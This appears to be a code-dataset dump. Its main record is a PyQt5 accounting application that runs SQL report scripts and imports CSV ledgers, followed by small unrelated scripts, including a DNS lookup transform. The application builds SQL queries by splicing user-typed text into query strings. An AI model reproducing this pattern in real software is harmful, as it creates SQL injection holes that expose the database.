self.showClientEntries.setObjectName(\"showClientEntries\");\r\n self.showClientEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures client\",\r\n \"sqlscript/ecriture_client.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code client : ', 's']]));\r\n \r\n \r\n self.showAnalyticsEntries = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsEntries.setObjectName(\"showAnalyticsEntries\");\r\n self.showAnalyticsEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures activité\",\r\n \"sqlscript/ecriture_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code de l\\'activité : ', 's']]));\r\n \r\n \r\n self.showClientAccount = QtWidgets.QAction(iris_main);\r\n self.showClientAccount.setObjectName(\"showClientAccount\");\r\n self.showClientAccount.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures d'un compte pour un client\",\r\n \"sqlscript/ecriture_compte_client.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code du client : ', 's'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showAnalyticsAccount = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsAccount.setObjectName(\"showAnalyticsAccount\");\r\n self.showAnalyticsAccount.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures d'un compte pour une activité\",\r\n \"sqlscript/ecriture_compte_activite.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez l\\'activité : ', 's'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showReportPlan = QtWidgets.QAction(iris_main);\r\n self.showReportPlan.setObjectName(\"showReportPlan\");\r\n self.showReportPlan.triggered.connect(functools.partial(self._query_from_file,\r\n \"Plan reporting\",\r\n \"sqlscript/plan_reporting.txt\"));\r\n \r\n self.showUnbalancedAnalytics = QtWidgets.QAction(iris_main);\r\n self.showUnbalancedAnalytics.setObjectName(\"showUnbalancedAnalytics\");\r\n self.showUnbalancedAnalytics.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures analytiques non équilibrées\",\r\n \"sqlscript/ecriture_analytique_non_equilibree.txt\",\r\n [['Entrez l\\'année : ', 'i']],\r\n True));\r\n \r\n self.showMissingAnalytics = QtWidgets.QAction(iris_main);\r\n self.showMissingAnalytics.setObjectName(\"showMissingAnalytics\");\r\n self.showMissingAnalytics.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures analytiques non renseignées\",\r\n \"sqlscript/ecriture_non_ventilee_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i']],\r\n True));\r\n \r\n self.openLogFile = QtWidgets.QAction(iris_main)\r\n self.openLogFile.setObjectName(\"openLogFile\")\r\n self.createLogFile = QtWidgets.QAction(iris_main)\r\n self.createLogFile.setObjectName(\"createLogFile\")\r\n self.modLogFile = QtWidgets.QAction(iris_main)\r\n self.modLogFile.setObjectName(\"modLogFile\")\r\n \r\n self.importBook = QtWidgets.QAction(iris_main)\r\n self.importBook.setObjectName(\"importBook\")\r\n self.importBook.triggered.connect(functools.partial(self._import_from_file, \r\n glob.PATH[glob.accounting_book], \r\n glob.TABLES_NAMES['grand_livre'], \r\n \"Importer un grand livre au format SAGE - csv\"));\r\n \r\n self.exportBookCSV = QtWidgets.QAction(iris_main)\r\n self.exportBookCSV.setObjectName(\"exportBookCSV\")\r\n \r\n self.importChartAccount = QtWidgets.QAction(iris_main)\r\n self.importChartAccount.setObjectName(\"importChartAccount\")\r\n self.importChartAccount.triggered.connect(functools.partial(self._import_from_file, \r\n glob.PATH[glob.chart_account_ext],\r\n glob.TABLES_NAMES['plan_comptable'],\r\n \"Importer un plan comptable\"));\r\n \r\n self.importAnalyticsAccount = QtWidgets.QAction(iris_main)\r\n self.importAnalyticsAccount.setObjectName(\"importAnalyticsAccount\")\r\n targets_tables = [];\r\n targets_tables.append(glob.TABLES_NAMES['analytics_plan']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_section']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_activity']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_relation']);\r\n self.importAnalyticsAccount.triggered.connect(functools.partial(self._import_splitted_file,\r\n glob.PATH[glob.analytics_account_ext],\r\n targets_tables,\r\n \"Importer un plan analytique\"));\r\n \r\n self.importReportingAccount = QtWidgets.QAction(iris_main)\r\n self.importReportingAccount.setObjectName(\"importReportingAccount\")\r\n targets_tables = [];\r\n targets_tables.append(glob.TABLES_NAMES['report_page']);\r\n targets_tables.append(glob.TABLES_NAMES['report_rubric']);\r\n targets_tables.append(glob.TABLES_NAMES['report_title']);\r\n targets_tables.append(glob.TABLES_NAMES['report_subtitle']);\r\n self.importReportingAccount.triggered.connect(functools.partial(self._import_splitted_file,\r\n glob.PATH[glob.chart_account_ext], \r\n targets_tables,\r\n \"Importer un plan reporting\"));\r\n \r\n self.importReportingRel = QtWidgets.QAction(iris_main);\r\n self.importReportingRel.setObjectName(\"editReportingRel\");\r\n self.importReportingRel.triggered.connect(functools.partial(self._import_from_file,\r\n glob.PATH[glob.chart_account_ext],\r\n glob.TABLES_NAMES['report_relation'],\r\n \"Importer une ventilation des comptes de reporting\"));\r\n \r\n self.quit = QtWidgets.QAction(iris_main)\r\n self.quit.setObjectName(\"quit\")\r\n self.menuFichier.addAction(self.openLogFile)\r\n self.menuFichier.addAction(self.createLogFile)\r\n self.menuFichier.addAction(self.modLogFile)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importBook)\r\n self.menuFichier.addAction(self.exportBookCSV)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importChartAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importAnalyticsAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importReportingAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importReportingRel);\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.quit)\r\n \r\n self.menuRqt.addAction(self.showAnalyticsBook)\r\n self.menuRqt.addAction(self.showReportPlan)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showGeneralBook)\r\n self.menuRqt.addAction(self.showGeneralEntries)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showClientEntries)\r\n self.menuRqt.addAction(self.showClientAccount)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showAnalyticsEntries)\r\n self.menuRqt.addAction(self.showAnalyticsAccount)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showUnbalancedAnalytics)\r\n self.menuRqt.addAction(self.showMissingAnalytics)\r\n \r\n self.menubar.addAction(self.menuFichier.menuAction())\r\n self.menubar.addAction(self.menuYear.menuAction())\r\n self.menubar.addAction(self.menuRqt.menuAction())\r\n \r\n #Initiate statusbar\r\n self.statusbar = QtWidgets.QStatusBar(iris_main)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n iris_main.setStatusBar(self.statusbar)\r\n \r\n #Initiate toolbar\r\n self.toolBar = QtWidgets.QToolBar(iris_main)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.toolBar.sizePolicy().hasHeightForWidth())\r\n self.toolBar.setSizePolicy(sizePolicy)\r\n self.toolBar.setMinimumSize(QtCore.QSize(0, 30))\r\n self.toolBar.setObjectName(\"toolBar\")\r\n iris_main.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)\r\n \r\n self.retranslateUi(iris_main)\r\n QtCore.QMetaObject.connectSlotsByName(iris_main)\r\n \r\n #INIT INFOS FROM THE MODEL\r\n #Init condic : connection with the database\r\n self._condic = conDic;\r\n self._db = mngr.DbManager(self._condic, 8889);\r\n \r\n if (self._db.error == False):\r\n #Fetch available table names and table infos\r\n self._db.init_tables();\r\n self._tables_names = self._db.tables_names;\r\n self._tables_desc = None;\r\n self._tables_head = None;\r\n self._fetch_tables_description();\r\n \r\n #Fetch available years and initialize the years menu\r\n #self._db.execute_query(\"SELECT DISTINCT YEAR(date_inscription) FROM tbl_client_pgrm;\");\r\n self._year_table = table_year;\r\n self._year_dimension = year_dimension;\r\n self._years = self._db.fetch_year_dimension(self._year_table, self._year_dimension);\r\n self._db.close_cursor();\r\n \r\n if (self._db.error == False):\r\n self._init_year_menu(iris_main);\r\n \r\n \r\n def retranslateUi(self, iris_main):\r\n _translate = QtCore.QCoreApplication.translate\r\n iris_main.setWindowTitle(_translate(\"iris_main\", \"Iris for EDE\"))\r\n \r\n self.menuFichier.setTitle(_translate(\"iris_main\", \"Fichier\"))\r\n self.menuYear.setTitle(_translate(\"iris_main\", \"Année\"))\r\n self.menuRqt.setTitle(_translate(\"iris_main\", \"Requêtes\"))\r\n \r\n self.toolBar.setWindowTitle(_translate(\"iris_main\", \"toolBar\"))\r\n \r\n self.showAnalyticsBook.setText(_translate(\"iris_main\", \"Afficher un grand livre analytique complet\"))\r\n self.showGeneralEntries.setText(_translate(\"iris_main\", \"Afficher les écritures pour un compte spécifique\"))\r\n self.showGeneralBook.setText(_translate(\"iris_main\", \"Afficher les écritures du grand livre général\"))\r\n self.showClientEntries.setText(_translate(\"iris_main\", \"Afficher les écritures analytique pour un client\"))\r\n self.showAnalyticsEntries.setText(_translate(\"iris_main\", \"Afficher les écritures analytiques pour une activité\"))\r\n self.showClientAccount.setText(_translate(\"iris_main\", \"Afficher les écritures d\\'un compte pour un client\"))\r\n self.showAnalyticsAccount.setText(_translate(\"iris_main\", \"Afficher les écritures d\\'un compte pour une activité\"))\r\n self.showReportPlan.setText(_translate(\"iris_main\", \"Afficher un plan reporting complet\"))\r\n self.showUnbalancedAnalytics.setText(_translate(\"iris_main\", \"Afficher les écritures analytiques non équilibrés\"))\r\n self.showMissingAnalytics.setText(_translate(\"iris_main\", \"Afficher les écritures non renseignées dans les plans\"))\r\n \r\n self.openLogFile.setText(_translate(\"iris_main\", \"Ouvrir un fichier de log\"))\r\n self.createLogFile.setText(_translate(\"iris_main\", \"Créer un fichier de log\"))\r\n self.modLogFile.setText(_translate(\"iris_main\", \"Modifier un fichier de log\"))\r\n self.importBook.setText(_translate(\"iris_main\", \"Importer un grand livre au format CSV - Sage\"))\r\n self.exportBookCSV.setText(_translate(\"iris_main\", \"Exporter un grand livre analytique au format CSV\"))\r\n self.importChartAccount.setText(_translate(\"iris_main\", \"Importer un plan comptable\"))\r\n self.importAnalyticsAccount.setText(_translate(\"iris_main\", \"Importer un plan analytique\"))\r\n self.importReportingAccount.setText(_translate(\"iris_main\", \"Importer un plan reporting\"));\r\n self.importReportingRel.setText(_translate(\"iris_main\", \"Importer une ventilation du plan de reporting\"));\r\n \r\n self.quit.setText(_translate(\"iris_main\", \"Quitter\"));\r\n# self.tabWidget.setTabText(self.tabWidget.indexOf(self.emptyTableViewTab), _translate(\"iris_main\", \"Tab 1\"))\r\n\r\n def _init_year_menu(self, parent):\r\n _translate = QtCore.QCoreApplication.translate\r\n for year in self._years:\r\n action = QtWidgets.QAction(parent);\r\n action.setObjectName(str(year));\r\n action.triggered.connect(self._init_tables_tree_view);\r\n self.menuYear.addAction(action);\r\n action.setText(_translate(\"iris_main\", str(year)));\r\n \r\n def _init_windows(self, iris_main):\r\n iris_main.setObjectName(\"iris_main\")\r\n iris_main.resize(1024, 768)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(iris_main.sizePolicy().hasHeightForWidth())\r\n iris_main.setSizePolicy(sizePolicy)\r\n iris_main.setMaximumSize(QtCore.QSize(16777215, 16777215))\r\n \r\n def _init_central_widget(self, iris_main):\r\n centralwidget = QtWidgets.QWidget(iris_main)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(centralwidget.sizePolicy().hasHeightForWidth())\r\n centralwidget.setSizePolicy(sizePolicy)\r\n centralwidget.setLayoutDirection(QtCore.Qt.LeftToRight)\r\n centralwidget.setObjectName(\"centralwidget\")\r\n return centralwidget;\r\n \r\n def _init_grid_layout(self, parent):\r\n gridLayout = QtWidgets.QGridLayout(parent)\r\n gridLayout.setObjectName(\"gridLayout\")\r\n return gridLayout;\r\n \r\n def _init_main_splitter(self, parent):\r\n mainSplitter = QtWidgets.QSplitter(parent)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(mainSplitter.sizePolicy().hasHeightForWidth())\r\n mainSplitter.setSizePolicy(sizePolicy)\r\n mainSplitter.setOrientation(QtCore.Qt.Horizontal)\r\n mainSplitter.setObjectName(\"mainSplitter\")\r\n return mainSplitter;\r\n \r\n def _init_left_layout(self, parent):\r\n leftLayoutWdg = QtWidgets.QWidget(parent)\r\n leftLayoutWdg.setObjectName(\"leftLayoutWdg\")\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n leftLayoutWdg.setSizePolicy(sizePolicy)\r\n return leftLayoutWdg;\r\n \r\n def _init_tables_tree_layout(self, parent):\r\n tablesTreeLayout = QtWidgets.QHBoxLayout(parent)\r\n tablesTreeLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n tablesTreeLayout.setContentsMargins(-1, -1, 0, -1)\r\n tablesTreeLayout.setSpacing(0)\r\n tablesTreeLayout.setObjectName(\"tablesTreeLayout\")\r\n return tablesTreeLayout;\r\n \r\n def _init_tables_tree_view(self):\r\n if (self.tablesTreeView is not None):\r\n self.tablesTreeView.deleteLater();\r\n self.tablesTreeView = None;\r\n \r\n self.tablesTreeView = treeView.TableTreeView(self._main_windows,\r\n self.leftLayoutWdg);\r\n self.tablesTreeLayout.addWidget(self.tablesTreeView);\r\n \r\n def _init_right_layout(self, parent):\r\n rightLayoutWdg = QtWidgets.QWidget(parent)\r\n rightLayoutWdg.setObjectName(\"rightLayoutWdg\")\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(3)\r\n rightLayoutWdg.setSizePolicy(sizePolicy)\r\n return rightLayoutWdg;\r\n \r\n def _init_tab_view_layout(self, parent):\r\n tabViewLayout = QtWidgets.QHBoxLayout(parent);\r\n tabViewLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n tabViewLayout.setSpacing(0);\r\n tabViewLayout.setObjectName(\"tabViewLayout\");\r\n return tabViewLayout;\r\n \r\n def _init_tab_widget(self, parent):\r\n #Intitiates the tabWidget\r\n tabWidget = QtWidgets.QTabWidget(self.rightLayoutWdg);\r\n tabWidget.setEnabled(True);\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding);\r\n sizePolicy.setHorizontalStretch(2);\r\n sizePolicy.setVerticalStretch(1);\r\n sizePolicy.setHeightForWidth(tabWidget.sizePolicy().hasHeightForWidth());\r\n tabWidget.setSizePolicy(sizePolicy);\r\n tabWidget.setTabsClosable(True);\r\n tabWidget.tabCloseRequested.connect(self._close_tab);\r\n tabWidget.setObjectName(\"tabWidget\");\r\n return tabWidget;\r\n \r\n def _create_query_tab(self, table_name):\r\n '''\r\n Creates a new empty query tab.\r\n '''\r\n \r\n emptyTableViewTab = QtWidgets.QWidget();\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, \r\n QtWidgets.QSizePolicy.Expanding);\r\n sizePolicy.setHorizontalStretch(2);\r\n sizePolicy.setVerticalStretch(1);\r\n sizePolicy.setHeightForWidth(emptyTableViewTab.sizePolicy().hasHeightForWidth());\r\n emptyTableViewTab.setSizePolicy(sizePolicy);\r\n emptyTableViewTab.setObjectName(table_name);\r\n return emptyTableViewTab; \r\n\r\n def add_new_query_tab(self, table_name):\r\n \r\n #Fetch the table content form the db aka the model\r\n table_content = self._db.fetch_table_content(table_name);\r\n self.statusbar.showMessage(\"Table content fetched. Please wait while processing data...\");\r\n \r\n #Model declaration, types conversion, avoiding primary column editing\r\n model = QStandardItemModel();\r\n table_primary = self._db.table_primary(table_name);\r\n for tpl in table_content:\r\n row = [];\r\n for field, head in zip(tpl, self._tables_head[table_name]):\r\n elem = QtGui.QStandardItem(str(field))\r\n if (head in table_primary.keys()):\r\n elem.setEditable(False);\r\n row.append(elem);\r\n model.appendRow(row);\r\n \r\n model.setHorizontalHeaderLabels(self._tables_head[table_name]);\r\n \r\n #Creates the tabWidget if necessary\r\n if (self.tabWidget == None):\r\n self.tabWidget = self._init_tab_widget(self.rightLayoutWdg);\r\n self.tabViewLayout.addWidget(self.tabWidget);\r\n self.tabWidget.raise_();\r\n self.tabWidget.setCurrentIndex(0);\r\n \r\n #Creates the new tab to be addes and setup its layout\r\n queryTab = self._create_query_tab(table_name);\r\n self.queryTabs.append(queryTab);\r\n horizontalLayout = QtWidgets.QHBoxLayout(queryTab);\r\n horizontalLayout.setObjectName(table_name);\r\n verticalLayout = QtWidgets.QVBoxLayout();\r\n verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n verticalLayout.setSpacing(0);\r\n verticalLayout.setObjectName(\"verticalLayout\");\r\n \r\n #Creates the custom QueryTableView that will handle the table content for the view\r\n try :\r\n queryTableView = QueryViewTable(table_name, self._main_windows, \r\n {\"model_changed\" : self._model_changed});\r\n\r\n queryTableView.setProxyModelSource(model);\r\n self.queryViews.append(queryTableView);\r\n \r\n #Adds the QueryTableView to the new layout included in the tabWidget\r\n verticalLayout.addWidget(queryTableView);\r\n horizontalLayout.addLayout(verticalLayout);\r\n self.tabWidget.addTab(queryTableView, table_name);\r\n self.tabWidget.setCurrentWidget(queryTableView);\r\n \r\n self.statusbar.showMessage('');\r\n \r\n except Exception as e:\r\n print(e);\r\n \r\n def _query_from_file(self, query_name, path, args = None):\r\n '''\r\n Opens a file that should contain a query and executes it. \r\n '''\r\n try:\r\n file = open(path, 'r');\r\n query = ''; \r\n \r\n for l in file:\r\n query += l;\r\n \r\n file.close();\r\n \r\n if (args):\r\n query = query % tuple(args);\r\n \r\n self._add_new_query_tab_from_query(query, query_name)\r\n \r\n except Exception as e:\r\n print(e);\r\n \r\n def _query_from_file_dialog(self, query_name, path, args : [], to_double = False):\r\n '''\r\n Creates several dialogs dynamically from a list of lists.\r\n Each list countains : the prompt and the type.\r\n The types = 'i' for int, 'f' for float, 's' for string.\r\n '''\r\n \r\n query_args = [];\r\n ok = True;\r\n \r\n for arg in args:\r\n val, ok = QInputDialog.getText(self, query_name, arg[0]);\r\n if (ok):\r\n if (arg[1] == 'i'):\r\n if (tf.is_integer(val)):\r\n val = int(val);\r\n query_args.append(val);\r\n \r\n else:\r\n ok = False;\r\n QMessageBox.setText(self, 'Merci de rentrer un entier.');\r\n break;\r\n \r\n elif (arg[1] == 'f'):\r\n if (tf.is_float(val)):\r\n val = float(val);\r\n query_args.append(val);\r\n \r\n else:\r\n ok = False;\r\n QMessageBox.setText(self, 'Merci de rentrer un nombre.');\r\n break;\r\n \r\n elif (arg[1] == 's'):\r\n val = '\\'' + val + '\\'';\r\n query_args.append(val);\r\n \r\n else:\r\n QMessageBox.setText(self, 'Erreur de paramètre sur le typage. Voir le code.');\r\n ok = False;\r\n break;\r\n else:\r\n break\r\n \r\n if (ok):\r\n #If the same args if asked two times in the query\r\n if (to_double):\r\n for i in range(len(query_args)):\r\n query_args.append(query_args[i]);\r\n \r\n self._query_from_file(query_name, path, query_args);\r\n \r\n def _add_new_query_tab_from_query(self, query, query_name):\r\n '''\r\n Add a new query tab directly from a query.\r\n The rows are not editable.\r\n The user is not expected to work an the db from a simple query.\r\n '''\r\n \r\n #Fetch data from query\r\n self._db.execute_query(query);\r\n \r\n if (self._db.error):\r\n self._db.close_cursor();\r\n else:\r\n \r\n query_result = self._db.fetch_all();\r\n desc = self._db.query_description();\r\n self._db.close_cursor();\r\n \r\n if (self._db.error == False and desc != None):\r\n \r\n #Model declaration, types conversion,\r\n \r\n model = QStandardItemModel();\r\n for tpl in query_result:\r\n row = [];\r\n for field in tpl:\r\n elem = QtGui.QStandardItem(str(field));\r\n elem.setEditable(False);\r\n row.append(elem);\r\n model.appendRow(row);\r\n \r\n #Set query's headers\r\n model.setHorizontalHeaderLabels(desc);\r\n \r\n #Creates the tabWidget if necessary\r\n if (self.tabWidget == None):\r\n self.tabWidget = self._init_tab_widget(self.rightLayoutWdg);\r\n self.tabViewLayout.addWidget(self.tabWidget);\r\n self.tabWidget.raise_();\r\n self.tabWidget.setCurrentIndex(0);\r\n \r\n queryTab = self._create_query_tab(query_name);\r\n self.queryTabs.append(queryTab);\r\n horizontalLayout = QtWidgets.QHBoxLayout(queryTab);\r\n horizontalLayout.setObjectName(query_name);\r\n verticalLayout = QtWidgets.QVBoxLayout();\r\n verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n verticalLayout.setSpacing(0);\r\n verticalLayout.setObjectName(\"verticalLayout\")\r\n \r\n #Creates the custom QueryTableView that will handle the query content for the view\r\n try :\r\n queryTableView = QueryViewTable(query_name, self._main_windows, \r\n {\"model_changed\" : self._model_changed});\r\n \r\n queryTableView.setProxyModelSource(model);\r\n self.queryViews.append(queryTableView);\r\n \r\n #Adds the QueryTableView to the new layout included in the tabWidget\r\n verticalLayout.addWidget(queryTableView);\r\n horizontalLayout.addLayout(verticalLayout);\r\n self.tabWidget.addTab(queryTableView, query_name);\r\n self.tabWidget.setCurrentWidget(queryTableView);\r\n \r\n self.statusbar.showMessage('');\r\n \r\n except Exception as e:\r\n print(e); \r\n\r\n def _close_tab(self, currentIndex):\r\n tabToClose = self.tabWidget.widget(currentIndex);\r\n tabToClose.deleteLater();\r\n self.tabWidget.removeTab(currentIndex);\r\n \r\n def _model_changed(self, table_name, modelIndex, model):\r\n table_primary = self._db.table_primary(table_name);\r\n table_header = self._db.table_headnames(table_name);\r\n row = modelIndex.row();\r\n col = modelIndex.column();\r\n what = {};\r\n what[table_header[col]] = modelIndex.data();\r\n where = {};\r\n for k in table_primary:\r\n where[k] = model.index(row, table_primary[k]).data();\r\n self._db.table_update(table_name, what, where);\r\n \r\n def _fetch_tables_description(self):\r\n '''\r\n Fetch description of all tables countained in the db.\r\n The descriptions are stocked in memory in dictionnaries and encapsulated.\r\n '''\r\n temp_desc = {};\r\n temp_headnames = {};\r\n for t in self._tables_names:\r\n temp_desc[t] = self._db.table_headers(t);\r\n temp_headnames[t] = self._db.table_headnames(t);\r\n self._tables_head = temp_headnames;\r\n self._tables_desc = temp_desc;\r\n\r\n def _open_file(self, open_file_prompt):\r\n '''\r\n Open a file from with the OS GUI through Qt.\r\n The file system will show the root directory of the project.\r\n '''\r\n root_path = os.path.dirname(__file__);\r\n root_path = os.path.abspath(os.path.join(root_path, os.pardir));\r\n root_path = os.path.abspath(os.path.join(root_path, os.pardir));\r\n try :\r\n fname = QFileDialog.getOpenFileName(self, \r\n open_file_prompt, \r\n root_path);\r\n \r\n if (fname[0]):\r\n f = open(fname[0], 'r', encoding='Latin-1');\r\n else:\r\n return None, None;\r\n \r\n except Exception as e:\r\n sys.stdout.write(e);\r\n msgBox = QMessageBox();\r\n msgBox.setText(\"Une erreur est survenue lors de l\\'accès au fichier.\" \\\r\n + \"Merci de recommencer l\\'opération ou de vérifier votre système\");\r\n msgBox.exec();\r\n return None, None;\r\n \r\n return f, fname[0];\r\n \r\n def _convert_csv_to_list(self, file):\r\n '''\r\n Convert a csv to a Python list.\r\n '''\r\n chart_account = csv.reader(file, delimiter = \";\");\r\n return [row for row in chart_account];\r\n \r\n def _import_from_file(self, file_ext = '.csv', target_table = '', prompt = ''):\r\n '''\r\n Import a chart account in csv (or file_ext) file format.\r\n The file header and types has to comply with the database table.\r\n '''\r\n file, filepath = self._open_file(prompt);\r\n \r\n if (file is None or file == ''):\r\n return None;\r\n \r\n else:\r\n filename, ifile_ext = os.path.splitext(filepath);\r\n if (ifile_ext != file_ext):\r\n msg = \"Merci de choisir un format \" \\\r\n + file_ext \\\r\n + \" pour l'import de \" + prompt;\r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Warning);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n elif (file_ext == '.csv' and target_table != ''):\r\n chart_list = self._convert_csv_to_list(file);\r\n file.close();\r\n \r\n icon = None;\r\n \r\n self._db.table_update_from_list(target_table, chart_list);\r\n \r\n if (self._db.error):\r\n msg = \"L'import a provoqué une erreur.\\n\";\r\n msg += \"Vérifiez votre fichier et recommencez l'opération.\";\r\n icon = QMessageBox.Warning;\r\n \r\n else:\r\n msg = \"L'import s'est déroulé correctement.\\n\";\r\n msg += str(self._db.rows_inserted) + \" insérées.\" \r\n icon = QMessageBox.Information;\r\n \r\n msgBox = QMessageBox();\r\n msgBox.setIcon(icon);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n elif (file_ext == '.csv'):\r\n chart_list = self._convert_csv_to_list(file);\r\n file.close;\r\n return chart_list;\r\n \r\n def _import_splitted_file(self, file_ext = '.csv', targets_tables = [], open_prompt = ''):\r\n '''\r\n Import a file and imports it into differents tables into the DB.\r\n ''' \r\n \r\n grid = self._import_from_file(prompt = open_prompt);\r\n \r\n if (grid is not None):\r\n \r\n for table_name in targets_tables: \r\n heads = self._tables_head[table_name];\r\n table_insert = [];\r\n \r\n for row in range(0, len(grid)):\r\n \r\n row_insert = [];\r\n for col in range(0, len(grid[row])):\r\n if (grid[0][col] in heads):\r\n row_insert.append(grid[row][col].strip());\r\n \r\n if (len(row_insert) == len(heads)):\r\n table_insert.append(row_insert);\r\n \r\n #table_insert.sort();\r\n #table_insert = list(r for r,_ in itertools.groupby(table_insert)); \r\n #table_insert.insert(0, heads);\r\n #print(table_insert);\r\n self._db.table_update_from_list(table_name, table_insert);\r\n \r\n if (self._db.error):\r\n msg = \"L'import a provoqué une erreur.\\n\";\r\n msg += \"Vérifiez votre fichier et recommencez l'opération.\";\r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Warning);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n return;\r\n \r\n msg = \"Limport s'est déroulé correctement.\\n\";\r\n msg += str(self._db.rows_inserted) + \" lignes insérées.\" \r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Information);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n ","sub_path":"view/iris_central.py","file_name":"iris_central.py","file_ext":"py","file_size_in_byte":39967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341720459","text":"#conversor de petragem e calculador de consumo de gazolina\nmetros = float(input(\"Me informe a distancia em metros da sua casa ate o seu serviço \"))\ndecimetros = metros*10\ncentimetros = metros*100\nmilimetros = metros*1000\ndecametros = metros/10\nhectometro = metros/100\nkilometros = metros/1000\ngazolina = (kilometros/8)*4.50\nprint(\" Você percorre {} metro, {} decimetros, {} centimetros, {} milimetros\".format(metros, decimetros, centimetros, milimetros)) \nprint(\" Ou {} decametros, {} hectometro, {}kilometro e consome por viagem {} de gazolina\".format(decametros, hectometro, kilometros, gazolina))\n","sub_path":"extra/exe008.py","file_name":"exe008.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108180399","text":"#!/usr/bin/env python3\n# vim: sta:et:sw=2:ts=2:sts=2\n\"\"\"\nConfig options\n\"\"\"\n\nfrom boot import *\n\nTHE= o( \n char = o( sep = \",\",\n num = \"$\",\n less = \"<\",\n more = \">\",\n skip = \"?\",\n klass= \"!\",\n doomed = r'([\\n\\t\\r ]|#.*)'),\n div = o( trivial = 1.025, \n cohen = 0.3, \n min = 0.5)\n)\n","sub_path":"hw/5/the.py","file_name":"the.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632622704","text":"#!/usr/bin/env python\n\nfrom canari.maltego.configuration import BuiltInTransformSets\nfrom canari.maltego.entities import DNSName\nfrom canari.framework import configure\n\nfrom common.dnstools import nslookup\n\n__author__ = 'Nadeem Douba'\n__copyright__ = 'Copyright 2012, Sploitego Project'\n__credits__ = []\n\n__license__ = 'GPL'\n__version__ = '0.1'\n__maintainer__ = 'Nadeem Douba'\n__email__ = 'ndouba@gmail.com'\n__status__ = 'Development'\n\n__all__ = [\n 'dotransform'\n]\n\n\n@configure(\n label='To IPv6 Address [DNS]',\n description='This transform attempts to resolve a DNS record to an IPv6 Address.',\n uuids=[\n 'sploitego.v2.DNSNameToIPv6Address_DNS'\n ],\n inputs=[\n ( BuiltInTransformSets.ResolveToIP, DNSName )\n ]\n)\ndef dotransform(request, response):\n nslookup(request.value, 'AAAA', response)\n return 